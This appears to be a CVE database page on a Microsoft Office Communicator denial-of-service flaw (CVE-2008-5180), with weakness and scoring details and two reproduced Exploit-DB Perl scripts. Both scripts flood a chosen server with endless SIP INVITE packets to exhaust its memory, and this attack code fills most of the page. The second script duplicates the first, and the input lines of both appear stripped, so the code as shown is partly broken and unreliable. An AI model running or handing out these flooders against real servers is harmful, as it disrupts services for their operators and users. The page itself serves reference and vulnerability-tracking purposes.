Related Weaknesses
CWE-ID |
Weakness Name |
Source |
CWE-770 |
Allocation of Resources Without Limits or Throttling The product allocates a reusable resource or group of resources on behalf of an actor without imposing any restrictions on the size or number of resources that can be allocated, in violation of the intended security policy for that actor. |
|
Metrics
Metric |
Score |
Severity |
CVSS Vector |
Source |
V2 |
5 |
|
AV:N/AC:L/Au:N/C:N/I:N/A:P |
nvd@nist.gov |
EPSS
EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.
EPSS Score
The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.
EPSS Percentile
The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.
Exploit information
Exploit Database EDB-ID : 7262
Publication date : 2008-11-27 23:00 +00:00
Author : Praveen Darshanam
EDB Verified : Yes
#!usr/bin/perl -w
################################################################################################################
# Microsoft Communicator allows remote attackers to cause a denial of service (memory consumption) via
# a large number of SIP INVITE requests, which trigger the creation of many sessions.
#
# Refer:
# http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-5180
# http://xforce.iss.net/xforce/xfdb/46673
#
#
# To run this exploit on MS Windows replace "#!usr/bin/perl -w" with "#!Installation_path_for_perl -w"
# (say #!C:/Program Files/Perl/bin/perl -w)
#
# This was strictly written for educational purpose. Use it at your own risk.
# Author will not bare any responsibility for any damages watsoever.
#
# Author: Praveen Darshanam
# Email: praveen[underscore]recker[at]sify.com
# Date: 27th November, 2008
#
# NOTE: Thanks to all my colleagues at iPolicy Networks for making this possible.
# For reliable security solutions please visit http://www.ipolicynetworks.com/
#
##################################################################################################################
use IO::Socket;
print("\nEnter IP Address of Vulnerable MS Communicator Server: \n");
$vuln_host_ip = ;
############################################################
#default port on which SIP works is UDP 5060
#go thru http://technet.microsoft.com/en-us/library/bb963969.aspx for default ports
###################
print("\nEnter UDP port for MS Communicator Server: \n");
$port = ;
$sock_sip = IO::Socket::INET->new( PeerAddr => $vuln_host_ip,
PeerPort => $port,
Proto => 'udp') || "Unable to create Socket";
#if the server is configured on TCP replace 'udp' with 'tcp'.
while(1)
{
print $sock_sip "INVITE sip:arpman.malicious.com SIP/2.0\r\nVia: SIP/2.0/UDP 172.16.16.4;branch=123-4567-900\r\n";
#kill by pressing Ctrl+c to stop flood of packets
}
#program never comes here for execution
close($sock_sip);
# milw0rm.com [2008-11-28]
Exploit Database EDB-ID : 12079
Publication date : 2010-04-05 22:00 +00:00
Author : indoushka
EDB Verified : No
========================================================================================
| # Title : Microsoft Office ( 2010 beta ) Communicator SIP denial of service Exploit
| # Author : indoushka
| # email : indoushka@hotmail.com
| # Home : www.iqs3cur1ty.com/vb
| # Tested on: windows SP2
| # Bug : Denial of service Exploit
====================== Exploit By indoushka =================================
# Exploit :
#!usr/bin/perl
#######################################################################################################################
# Microsoft Office 2010 Communicator allows remote attack to cause a denial of service (memory consumption) via #
# a large number of SIP INVITE requests. #
#######################################################################################################################
use IO::Socket;
print("\nEnter IP Address of Target Server: \n");
$vuln_host_ip = ;
print("\nEnter IP Address of Target Server: \n");
$port = ;
$sock_sip = IO::Socket::INET->new( PeerAddr => $vuln_host_ip,
PeerPort => $port,
Proto => 'udp') || "Unable to create Socket";
#if the server is configured on TCP replace 'udp' with 'tcp'.
while(1)
{
print $sock_sip "INVITE sip:arpman.malicious.com SIP/2.0\r\nVia: SIP/2.0/UDP 172.16.16.4;branch=123-4567-900\r\n";
}
#program never comes here for execution
close($sock_sip);
Dz-Ghost Team ===== Saoucha * Star08 * Redda * Silitoad * XproratiX * onurozkan * n2n * ========================
Greetz :
Exploit-db Team :
(loneferret+Exploits+dookie2000ca)
all my friend :
His0k4 * Hussin-X * Rafik (www.Tinjah.com) * Yashar (www.sc0rpion.ir) SoldierOfAllah (www.m4r0c-s3curity.cc)
Stake (www.v4-team.com) * r1z (www.sec-r1z.com) * D4NB4R (http://www.ilegalintrusion.net/foro/)
Cyb3r IntRue (avengers team) * The globin * Virus_Hima
---------------------------------------------------------------------------------------------------------------
Products Mentioned
Configuraton 0
Microsoft>>Office_communicator >> Version *
References